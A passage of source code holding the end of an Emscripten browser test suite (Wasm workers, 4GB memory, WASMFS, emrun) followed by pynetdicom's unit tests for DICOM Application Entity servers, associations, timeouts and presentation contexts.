test_wasm_worker_semaphore_waitinf_acquire(self): self.btest(test_file('wasm_worker/semaphore_waitinf_acquire.c'), expected='0', args=['-sWASM_WORKERS']) # Tests emscripten_semaphore_try_acquire() on the main thread @also_with_minimal_runtime def test_wasm_worker_semaphore_try_acquire(self): self.btest(test_file('wasm_worker/semaphore_try_acquire.c'), expected='0', args=['-sWASM_WORKERS']) @no_firefox('no 4GB support yet') @require_v8 def test_zzz_zzz_4gb(self): # TODO Convert to an actual browser test when it reaches stable. # For now, keep this in browser as this suite runs serially, which # means we don't compete for memory with anything else (and run it # at the very very end, to reduce the risk of it OOM-killing the # browser). # test that we can allocate in the 2-4GB range, if we enable growth and # set the max appropriately self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB'] self.do_run_in_out_file_test('browser', 'test_4GB.cpp') # Tests that emmalloc supports up to 4GB Wasm heaps. @no_firefox('no 4GB support yet') def test_zzz_zzz_emmalloc_4gb(self): self.btest(test_file('mem_growth.cpp'), expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed args=['-sMALLOC=emmalloc', '-sABORTING_MALLOC=0', '-sALLOW_MEMORY_GROWTH=1', '-sMAXIMUM_MEMORY=4GB']) # Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc. # Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations. @no_firefox('no 4GB support yet') def test_emmalloc_3GB(self): def test(args): self.btest_exit(test_file('alloc_3gb.cpp'), args=['-sMAXIMUM_MEMORY=4GB', '-sALLOW_MEMORY_GROWTH=1'] + args) test(['-sMALLOC=emmalloc']) test(['-sMALLOC=emmalloc-debug']) test(['-sMALLOC=emmalloc-memvalidate']) test(['-sMALLOC=emmalloc-memvalidate-verbose']) @parameterized({ # the fetch backend works even on the main thread: we proxy to a background # thread and busy-wait 'main_thread': (['-sPTHREAD_POOL_SIZE=1'],), # using proxy_to_pthread also works, of course 'proxy_to_pthread': (['-sPROXY_TO_PTHREAD'],), }) @requires_threads def test_wasmfs_fetch_backend(self, args): if is_firefox() and '-sPROXY_TO_PTHREAD' not in args: return self.skipTest('ff hangs on the main_thread version. browser bug?') create_file('data.dat', 'hello, fetch') self.btest_exit(test_file('wasmfs/wasmfs_fetch.c'), args=['-sWASMFS', '-sUSE_PTHREADS'] + args) @requires_threads @no_firefox('no OPFS support yet') def test_wasmfs_opfs(self): test = test_file('wasmfs/wasmfs_opfs.c') args = ['-sWASMFS', '-pthread', '-sPROXY_TO_PTHREAD'] self.btest_exit(test, args=args + ['-DWASMFS_SETUP']) self.btest_exit(test, args=args + ['-DWASMFS_RESUME']) @no_firefox('no 4GB support yet') def test_zzz_zzz_emmalloc_memgrowth(self, *args): self.btest(test_file('browser/emmalloc_memgrowth.cpp'), expected='0', args=['-sMALLOC=emmalloc', '-sALLOW_MEMORY_GROWTH=1', '-sABORTING_MALLOC=0', '-sASSERTIONS=2', '-sMINIMAL_RUNTIME=1', '-sMAXIMUM_MEMORY=4GB']) @no_firefox('no 4GB support yet') @require_v8 def test_zzz_zzz_2gb_fail(self): # TODO Convert to an actual browser test when it reaches stable. # For now, keep this in browser as this suite runs serially, which # means we don't compete for memory with anything else (and run it # at the very very end, to reduce the risk of it OOM-killing the # browser). # test that growth doesn't go beyond 2GB without the max being set for that, # and that we can catch an allocation failure exception for that self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=2GB'] self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp') @no_firefox('no 4GB support yet') @require_v8 def test_zzz_zzz_4gb_fail(self): # TODO Convert to an actual browser test when it reaches stable. # For now, keep this in browser as this suite runs serially, which # means we don't compete for memory with anything else (and run it # at the very very end, to reduce the risk of it OOM-killing the # browser). # test that we properly report an allocation error that would overflow over # 4GB. self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB', '-sABORTING_MALLOC=0'] self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp') # Tests that Emscripten-compiled applications can be run when a slash in the URL query or fragment of the js file def test_browser_run_with_slash_in_query_and_hash(self): self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O0']) src = open('test.html').read() # Slash in query create_file('test-query.html', src.replace('test.js', 'test.js?type=pass/fail')) self.run_browser('test-query.html', None, '/report_result?0') # Slash in fragment create_file('test-hash.html', src.replace('test.js', 'test.js#pass/fail')) self.run_browser('test-hash.html', None, '/report_result?0') # Slash in query and fragment create_file('test-query-hash.html', src.replace('test.js', 'test.js?type=pass/fail#pass/fail')) self.run_browser('test-query-hash.html', None, '/report_result?0') @disabled("only run this manually, to test for race conditions") @parameterized({ 'normal': ([],), 'assertions': (['-sASSERTIONS'],) }) @requires_threads def test_manual_pthread_proxy_hammer(self, args): # the specific symptom of the hang that was fixed is that the test hangs # at some point, using 0% CPU. often that occured in 0-200 iterations, but # you may want to adjust "ITERATIONS". self.btest_exit(test_file('pthread/test_pthread_proxy_hammer.cpp'), args=['-sUSE_PTHREADS', '-O2', '-sPROXY_TO_PTHREAD', '-DITERATIONS=1024', '-g1'] + args, timeout=10000, # don't run this with the default extra_tries value, as this is # *meant* to notice something random, a race condition. extra_tries=0) def test_assert_failure(self): self.btest(test_file('browser/test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"') def test_full_js_library_strict(self): self.btest_exit(test_file('hello_world.c'), args=['-sINCLUDE_FULL_LIBRARY', '-sSTRICT_JS']) EMRUN = path_from_root('emrun') class emrun(RunnerCore): def test_emrun_info(self): if not has_browser(): self.skipTest('need a browser') result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout assert 'CPU' in result assert 'Browser' in result assert 'Traceback' not in result result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout assert 'Traceback' not in result def test_no_browser(self): # Test --no_browser mode where we have to take care of launching the browser ourselves # and then killing emrun when we are done. if not has_browser(): self.skipTest('need a browser') self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html']) proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE) try: if EMTEST_BROWSER: print('Starting browser') browser_cmd = shlex.split(EMTEST_BROWSER) browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html']) try: while True: stdout = proc.stdout.read() if b'Dumping out file' in stdout: break finally: print('Terminating browser') browser.terminate() browser.wait() finally: print('Terminating emrun server') proc.terminate() proc.wait() def test_emrun(self): self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html']) if not has_browser(): self.skipTest('need a browser') # We cannot run emrun from the temp directory the suite will clean up afterwards, since the # browser that is launched will have that directory as startup directory, and the browser will # not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to # delete it. Therefore switch away from that directory before launching. os.chdir(path_from_root()) args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile', '--kill_exit', '--port', '6939', '--verbose', '--log_stdout', self.in_dir('stdout.txt'), '--log_stderr', self.in_dir('stderr.txt')] # Verify that trying to pass argument to the page without the `--` separator will # generate an actionable error message err = self.expect_fail(args_base + ['--foo']) self.assertContained('error: unrecognized arguments: --foo', err) self.assertContained('remember to add `--` between arguments', err) if EMTEST_BROWSER is not None: # If EMTEST_BROWSER carried command line arguments to pass to the browser, # (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun, # so strip them out. browser_cmd = shlex.split(EMTEST_BROWSER) browser_path = browser_cmd[0] args_base += ['--browser', browser_path] if len(browser_cmd) > 1: browser_args = browser_cmd[1:] if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args): # emrun uses its own -profile, strip it out parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless parser.add_argument('-profile') parser.add_argument('--profile') browser_args = parser.parse_known_args(browser_args)[1] if browser_args: args_base += ['--browser_args', ' ' + ' '.join(browser_args)] for args in [ args_base, args_base + ['--private_browsing', '--port', '6941'], args_base + ['--dump_out_directory', 'other dir/multiple', '--port', '6942'] ]: args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3'] print(shared.shlex_join(args)) proc = self.run_process(args, check=False) self.assertEqual(proc.returncode, 100) dump_dir = 'other dir/multiple' if '--dump_out_directory' in args else 'dump_out' self.assertExists(self.in_dir(f'{dump_dir}/test.dat')) self.assertExists(self.in_dir(f'{dump_dir}/heap.dat')) self.assertExists(self.in_dir(f'{dump_dir}/nested/with space.dat')) stdout = read_file(self.in_dir('stdout.txt')) stderr = read_file(self.in_dir('stderr.txt')) self.assertContained('argc: 4', stdout) self.assertContained('argv[3]: --3', stdout) self.assertContained('hello, world!', stdout) self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout) self.assertContained('Testing char sequences: %20%21 &auml;', stdout) self.assertContained('hello, error stream!', stderr)
test_ae.py
"""Tests for the ae module.""" import os import signal import threading import time import pytest from pydicom import read_file from pydicom.dataset import Dataset from pydicom.uid import UID, ImplicitVRLittleEndian from pynetdicom import ( AE, evt, debug_logger, build_context, DEFAULT_TRANSFER_SYNTAXES, StoragePresentationContexts, VerificationPresentationContexts, PYNETDICOM_IMPLEMENTATION_UID, PYNETDICOM_IMPLEMENTATION_VERSION ) from pynetdicom.presentation import build_context from pynetdicom.sop_class import RTImageStorage, VerificationSOPClass #debug_logger() TEST_DS_DIR = os.path.join(os.path.dirname(__file__), 'dicom_files') DATASET = read_file(os.path.join(TEST_DS_DIR, 'RTImageStorage.dcm')) COMP_DATASET = read_file(os.path.join(TEST_DS_DIR, 'MRImageStorage_JPG2000_Lossless.dcm')) def test_blocking_handler(): """Test binding events to the blocking AssociationServer.""" ae = AE() ae.add_supported_context('1.2.840.10008.1.1') def handle_echo(event): return 0x0000 handlers = [(evt.EVT_C_ECHO, handle_echo)] thread = threading.Thread( target=ae.start_server, args=(('', 11112), ), kwargs={'evt_handlers' : handlers} ) thread.daemon = True thread.start() time.sleep(0.1) ae.shutdown() class TestStartServer(object): """Tests for AE.start_server()""" def setup(self): """Run prior to each test""" self.ae = None def teardown(self): """Clear any active threads""" if self.ae: self.ae.shutdown() def test_ae_title(self): """Test the `ae_title` keyword parameter.""" self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.ae_title = b'TESTAET' assert ae.ae_title == b'TESTAET ' ae.add_supported_context(VerificationSOPClass) server = ae.start_server(('', 11112), block=False) assert server.ae_title == ae.ae_title server.shutdown() server = ae.start_server(('', 11112), block=False, ae_title=b'MYAE') assert server.ae_title == b'MYAE ' ae.require_called_aet = True ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('', 11112, ae_title=b'MYAE') assert assoc.is_established assoc.release() assert assoc.is_released server.shutdown() def test_contexts(self): """Test the `contexts` keyword parameter.""" self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.ae_title = b'TESTAET' assert ae.ae_title == b'TESTAET ' cx = build_context(VerificationSOPClass) server = ae.start_server(('', 11112), block=False, contexts=[cx]) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('', 11112, ae_title=b'MYAE') assert assoc.is_established assert assoc.accepted_contexts[0].abstract_syntax == VerificationSOPClass assoc.release() assert assoc.is_released server.shutdown() class TestAEVerificationSCP(object): """Check verification SCP""" def setup(self): """Run prior to each test""" self.ae = None def teardown(self): """Clear any active threads""" if self.ae: self.ae.shutdown() def test_start_server_keyboard_interrupt(self): """Test stopping the SCP with keyboard""" pid = os.getpid() def trigger_signal(): time.sleep(0.1) os.kill(pid, signal.SIGINT) self.ae = ae = AE() ae.add_supported_context('1.2.3') thread = threading.Thread(target=trigger_signal) thread.daemon = True thread.start() ae.start_server(('', 11112)) ae.shutdown() def test_no_supported_contexts(self): """Test starting with no contexts raises""" ae = AE() with pytest.raises(ValueError, match=r"No supported Presentation"): ae.start_server(('', 11112)) def test_new_scu_scp_warning(self, caplog): """Test that a warning is given if scu_role and scp_role bad.""" ae = AE() ae.add_supported_context('1.2.3.4', scp_role=False) msg = r"The following presentation contexts have " with pytest.raises(ValueError, match=msg): ae.start_server(('', 11112)) def test_str_empty(self): """Test str output for default AE""" ae = AE() ae.__str__() class TestAEPresentationSCU(object): """Tests for AE presentation contexts when running as an SCU""" def setup(self): """Run prior to each test""" self.ae = None def teardown(self): """Clear any active threads""" if self.ae: self.ae.shutdown() def test_associate_context(self): """Test that AE.associate doesn't modify the supplied contexts""" # Test AE.requested_contexts self.ae = ae = AE() ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.requested_contexts = VerificationPresentationContexts ae.acse_timeout = 5 ae.dimse_timeout = 5 assoc = ae.associate('localhost', 11112) assert assoc.is_established assert ae.requested_contexts[0].context_id is None assert len(assoc.requestor.requested_contexts) == 1 assert assoc.requestor.requested_contexts[0].abstract_syntax == ( '1.2.840.10008.1.1' ) assert assoc.requestor.requested_contexts[0].context_id == 1 assoc.release() assert not assoc.is_established assert assoc.is_released # Test associate(contexts=...) ae.requested_contexts = [] assoc = ae.associate('localhost', 11112, contexts=VerificationPresentationContexts) assert assoc.is_established assert VerificationPresentationContexts[0].context_id is None assert len(assoc.requestor.requested_contexts) == 1 assert assoc.requestor.requested_contexts[0].abstract_syntax == ( '1.2.840.10008.1.1' ) assert assoc.requestor.requested_contexts[0].context_id == 1 assoc.release() assert not assoc.is_established assert assoc.is_released scp.shutdown() def test_associate_context_raises(self): """Test that AE.associate raises exception if no requested contexts""" self.ae = ae = AE() with pytest.raises(RuntimeError): assoc = ae.associate('localhost', 11112) class TestAEGoodTimeoutSetters(object): def test_acse_timeout(self): """ Check AE ACSE timeout change produces good value """ ae = AE() assert ae.acse_timeout == 30 ae.acse_timeout = None assert ae.acse_timeout is None ae.acse_timeout = -100 assert ae.acse_timeout == 30 ae.acse_timeout = 'a' assert ae.acse_timeout == 30 ae.acse_timeout = 0 assert ae.acse_timeout == 0 ae.acse_timeout = 30 assert ae.acse_timeout == 30 def test_dimse_timeout(self): """ Check AE DIMSE timeout change produces good value """ ae = AE() assert ae.dimse_timeout is 30 ae.dimse_timeout = None assert ae.dimse_timeout is None ae.dimse_timeout = -100 assert ae.dimse_timeout is 30 ae.dimse_timeout = 'a' assert ae.dimse_timeout is 30 ae.dimse_timeout = 0 assert ae.dimse_timeout == 0 ae.dimse_timeout = 30 assert ae.dimse_timeout == 30 def test_network_timeout(self): """ Check AE network timeout change produces good value """ ae = AE() assert ae.network_timeout == 60 ae.network_timeout = None assert ae.network_timeout is None ae.network_timeout = -100 assert ae.network_timeout == 60 ae.network_timeout = 'a' assert ae.network_timeout == 60 ae.network_timeout = 0 assert ae.network_timeout == 0 ae.network_timeout = 30 assert ae.network_timeout == 30 def test_active_acse(self): """Test changing acse_timeout with active associations.""" ae = AE() ae.add_supported_context('1.2.840.10008.1.1') scp = ae.start_server(('', 11112), block=False) ae.add_requested_context('1.2.840.10008.1.1') assoc = ae.associate('localhost', 11112) assert assoc.is_established assert assoc.acse_timeout == 30 ae.acse_timeout = 5 assert assoc.acse_timeout == 5 assoc.release() scp.shutdown() ae.shutdown() def test_active_dimse(self): """Test changing dimse_timeout with active associations.""" ae = AE() ae.add_supported_context('1.2.840.10008.1.1') scp = ae.start_server(('', 11112), block=False) ae.add_requested_context('1.2.840.10008.1.1') assoc = ae.associate('localhost', 11112) assert assoc.is_established assert assoc.dimse_timeout == 30 ae.dimse_timeout = 5 assert assoc.dimse_timeout == 5 assoc.release() scp.shutdown() def test_active_network(self): """Test changing network_timeout with active associations.""" ae = AE() ae.add_supported_context('1.2.840.10008.1.1') scp = ae.start_server(('', 11112), block=False) ae.add_requested_context('1.2.840.10008.1.1') assoc = ae.associate('localhost', 11112) assert assoc.is_established assert assoc.network_timeout == 60 ae.network_timeout = 5 assert assoc.network_timeout == 5 assoc.release() scp.shutdown() class TestAEGoodAssociation(object): def setup(self): """Run prior to each test""" self.ae = None def teardown(self): """Clear any active threads""" if self.ae: self.ae.shutdown() def test_associate_establish_release(self): """ Check SCU Association with SCP """ self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() assert not assoc.is_established assert assoc.is_released scp.shutdown() def test_associate_max_pdu(self): """ Check Association has correct max PDUs on either end """ self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.maximum_pdu_size = 54321 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) scu_ae = AE() scu_ae.acse_timeout = 5 scu_ae.dimse_timeout = 5 scu_ae.network_timeout = 5 scu_ae.add_requested_context(VerificationSOPClass) assoc = scu_ae.associate('localhost', 11112, max_pdu=12345) assert assoc.is_established assert scp.active_associations[0].acceptor.maximum_length == ( 54321 ) assert scp.active_associations[0].requestor.maximum_length == ( 12345 ) assert assoc.requestor.maximum_length == 12345 assert assoc.acceptor.maximum_length == 54321 assoc.release() # Check 0 max pdu value - max PDU value maps to 0x10000 internally assoc = scu_ae.associate('localhost', 11112, max_pdu=0) assert assoc.requestor.maximum_length == 0 assert scp.active_associations[0].requestor.maximum_length == 0 assoc.release() scp.shutdown() def test_association_timeouts(self): """ Check that the Association timeouts are being set correctly and work """ DELAY = [] def handle(event): if DELAY: time.sleep(DELAY[0]) return 0x0000 self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 0.5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server( ('', 11112), block=False, evt_handlers=[(evt.EVT_C_ECHO, handle)] ) scu_ae = AE() scu_ae.acse_timeout = 30 scu_ae.dimse_timeout = 30 scu_ae.network_timeout = 30 scu_ae.add_requested_context(VerificationSOPClass) assoc = scu_ae.associate('localhost', 11112) assert assoc.is_established # Hit the network timeout time.sleep(1.0) assert assoc.is_aborted assert len(scp.active_associations) == 0 ae.acse_timeout = None ae.dimse_timeout = None ae.network_timeout = None scu_ae.acse_timeout = 30 scu_ae.dimse_timeout = 0 DELAY.append(1) assoc = scu_ae.associate('localhost', 11112) assert assoc.is_established status = assoc.send_c_echo() time.sleep(1.5) assert assoc.is_aborted assert len(scp.active_associations) == 0 scu_ae.acse_timeout = 0 scu_ae.dimse_timeout = 30 assoc = scu_ae.associate('localhost', 11112) assert not assoc.is_established assert len(scp.active_associations) == 0 ae.acse_timeout = 21 ae.dimse_timeout = 22 scu_ae.acse_timeout = 31 scu_ae.dimse_timeout = 32 assoc = scu_ae.associate('localhost', 11112) assert assoc.is_established assert scp.active_associations[0].acse_timeout == 21 assert scp.active_associations[0].dimse_timeout == 22 assert assoc.acse_timeout == 31 assert assoc.dimse_timeout == 32 assoc.release() scp.shutdown() def test_select_timeout_okay(self): """Test that using start works OK with timeout.""" # Multiple release/association in a sort time causes an OSError as # the port is still in use due to the use of select.select() with # a timeout. Fixed by using socket.shutdown in stop() for ii in range(3): self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() assert assoc.is_released assert not assoc.is_established scp.shutdown() class TestAEBadAssociation(object): def test_raise(self): """Test bad associate call""" ae = AE() ae.add_requested_context(VerificationSOPClass) with pytest.raises(TypeError): ae.associate(1112, 11112) with pytest.raises(TypeError): ae.associate('localhost', '1.2.3.4') class TestAEGoodMiscSetters(object): def setup(self): self.ae = None def teardown(self): if self.ae: self.ae.shutdown() def test_ae_title_good(self): """ Check AE title change produces good value """ ae = AE() ae.ae_title = ' TEST ' assert ae.ae_title == b'TEST ' ae.ae_title = ' TEST' assert ae.ae_title == b'TEST ' ae.ae_title = ' TEST' assert ae.ae_title == b'TEST ' ae.ae_title = 'a TEST' assert ae.ae_title == b'a TES' ae.ae_title = 'a TEST' assert ae.ae_title == b'a TEST ' def test_max_assoc_good(self): """ Check AE maximum association change produces good value """ ae = AE() ae.maximum_associations = -10 assert ae.maximum_associations == 1 ae.maximum_associations = ['a'] assert ae.maximum_associations == 1 ae.maximum_associations = '10' assert ae.maximum_associations == 1 ae.maximum_associations = 0 assert ae.maximum_associations == 1 ae.maximum_associations = 5 assert ae.maximum_associations == 5 def test_max_pdu_good(self): """ Check AE maximum pdu size change produces good value """ ae = AE() ae.maximum_pdu_size = -10 assert ae.maximum_pdu_size == 16382 ae.maximum_pdu_size = 0 assert ae.maximum_pdu_size == 0 ae.maximum_pdu_size = 5000 assert ae.maximum_pdu_size == 5000 def test_require_calling_aet(self): """Test AE.require_calling_aet""" self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() assert assoc.is_released assert not assoc.is_established ae.require_calling_aet = [b'MYAE'] assert ae.require_calling_aet == [b'MYAE '] assoc = ae.associate('localhost', 11112) assert assoc.is_rejected ae.require_calling_aet = [b'PYNETDICOM '] assert ae.require_calling_aet == [b'PYNETDICOM '] assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() with pytest.raises(ValueError, match=r"entirely of only spaces"): ae.require_calling_aet = [b''] assert ae.require_calling_aet == [b'PYNETDICOM '] assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() scp.shutdown() def test_require_called_aet(self): """Test AE.require_called_aet""" self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() assert assoc.is_released assert not assoc.is_established ae.require_called_aet = True assert ae.require_called_aet is True assoc = ae.associate('localhost', 11112) assert assoc.is_rejected assoc = ae.associate('localhost', 11112, ae_title=b'PYNETDICOM') assert assoc.is_established assoc.release() scp.shutdown() def test_req_calling_aet(self): """ Check AE require calling aet change produces good value """ ae = AE() ae.require_calling_aet = [b'10', b'asdf'] assert ae.require_calling_aet == [ b'10 ', b'asdf ' ] def test_req_called_aet(self): """ Check AE require called aet change produces good value """ ae = AE() assert ae.require_called_aet is False ae.require_called_aet = True assert ae.require_called_aet is True ae.require_called_aet = False assert ae.require_called_aet is False def test_string_output(self): """Test string output""" ae = AE() ae.add_requested_context(VerificationSOPClass) ae.require_calling_aet = [b'something'] ae.require_called_aet = True assert 'Explicit VR' in ae.__str__() assert 'Verification' in ae.__str__() assert '0/10' in ae.__str__() assert 'something' in ae.__str__() assert 'Require called AE title: True' in ae.__str__() ae.supported_contexts = StoragePresentationContexts assert 'CT Image' in ae.__str__() ae = AE() ae.add_requested_context(VerificationSOPClass) assert 'None' in ae.__str__() self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('localhost', 11112) assert assoc.is_established assert assoc.is_established assert 'Explicit VR' in ae.__str__() assert 'Peer' in ae.__str__() assoc.release() assert assoc.is_released assert not assoc.is_established scp.shutdown() def test_init_implementation_class(self): """Test the default implementation class uid""" ae = AE() assert ae.implementation_class_uid == PYNETDICOM_IMPLEMENTATION_UID def test_init_implementation_version(self): """Test the default implementation version name""" ae = AE() assert ae.implementation_version_name == PYNETDICOM_IMPLEMENTATION_VERSION class TestAEBadInitialisation(object): def test_ae_title_all_spaces(self): """AE should fail if ae_title is all spaces""" with pytest.raises(ValueError): AE(ae_title=b' ') def test_ae_title_empty_str(self): """AE should fail if ae_title is an empty str""" with pytest.raises(ValueError): AE(ae_title=b'') def test_ae_title_invalid_chars(self): """ AE should fail if ae_title is not a str """ with pytest.raises(ValueError): AE(ae_title=b'TEST\ME') class TestAE_GoodExit(object): def setup(self): """Run prior to each test""" self.ae = None def teardown(self): """Clear any active threads""" if self.ae: self.ae.shutdown() def test_ae_release_assoc(self): """ Association releases OK """ self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) # Test N associate/release cycles for ii in range(5): assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() assert not assoc.is_established assert not assoc.is_aborted assert assoc.is_released assert not assoc.is_rejected scp.shutdown() def test_ae_aborts_assoc(self): """ Association aborts OK """ self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) # Test N associate/abort cycles for ii in range(5): assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.abort() assert not assoc.is_established assert assoc.is_aborted assert not assoc.is_released assert not assoc.is_rejected scp.shutdown() class TestAESupportedPresentationContexts(object): """Tests for AE's presentation contexts when acting as an SCP""" def setup(self): self.ae = AE() def test_add_supported_context_str(self): """Tests for AE.add_supported_context using str.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert context.context_id is None def test_add_supported_context_sop_class(self): """Tests for AE.add_supported_context using SOPClass.""" self.ae.add_supported_context(RTImageStorage) context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_uid(self): """Tests for AE.add_supported_context using UID.""" self.ae.add_supported_context(UID('1.2.840.10008.1.1')) context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_duplicate(self): """Tests for AE.add_supported_context using a duplicate UID.""" self.ae.add_supported_context(UID('1.2.840.10008.1.1')) self.ae.add_supported_context(UID('1.2.840.10008.1.1')) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.840.10008.1.1' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_transfer_single(self): """Test adding a single transfer syntax without a list""" self.ae.add_supported_context('1.2', '1.3') contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2' assert contexts[0].transfer_syntax == ['1.3'] self.ae.add_supported_context('1.2', UID('1.4')) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2' assert contexts[0].transfer_syntax == ['1.3', '1.4'] def test_add_supported_context_duplicate_transfer(self): """Test adding duplicate transfer syntaxes.""" self.ae.add_supported_context('1.2', ['1.3', '1.3']) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2' assert contexts[0].transfer_syntax == ['1.3'] self.ae.supported_contexts = [] self.ae.add_supported_context('1.2.840.10008.1.1') self.ae.add_supported_context('1.2.840.10008.1.1') contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.840.10008.1.1' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES self.ae.supported_contexts = [] self.ae.add_supported_context('1.2.840.10008.1.1') self.ae.add_supported_context('1.2.840.10008.1.1', [DEFAULT_TRANSFER_SYNTAXES[0]]) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.840.10008.1.1' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_duplicate_multi(self): """Tests for AE.add_supported_context using a duplicate UID.""" self.ae.add_supported_context('1.2.840.10008.1.1', [DEFAULT_TRANSFER_SYNTAXES[0]]) self.ae.add_supported_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES[1:]) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.840.10008.1.1' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_private_abs(self): """Test AE.add_supported_context with a private abstract syntax""" self.ae.add_supported_context('1.2.3.4') contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.3.4' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_supported_context_private_tran(self): """Test AE.add_supported_context with a private transfer syntax""" self.ae.add_supported_context('1.2.3.4', ['1.2.3', '1.2.840.10008.1.1']) contexts = self.ae.supported_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.3.4' assert contexts[0].transfer_syntax == ['1.2.3', '1.2.840.10008.1.1'] def test_add_supported_context_more_128(self): """Test adding more than 128 presentation contexts""" for ii in range(300): self.ae.add_supported_context(str(ii)) contexts = self.ae.supported_contexts assert len(contexts) == 300 def test_supported_contexts_setter(self): """Test the AE.supported_contexts property setter.""" context = build_context('1.2.840.10008.1.1') self.ae.supported_contexts = [context] contexts = self.ae.supported_contexts assert len(contexts) == 1 assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert context.context_id is None def test_supported_contexts_empty(self): """Test the 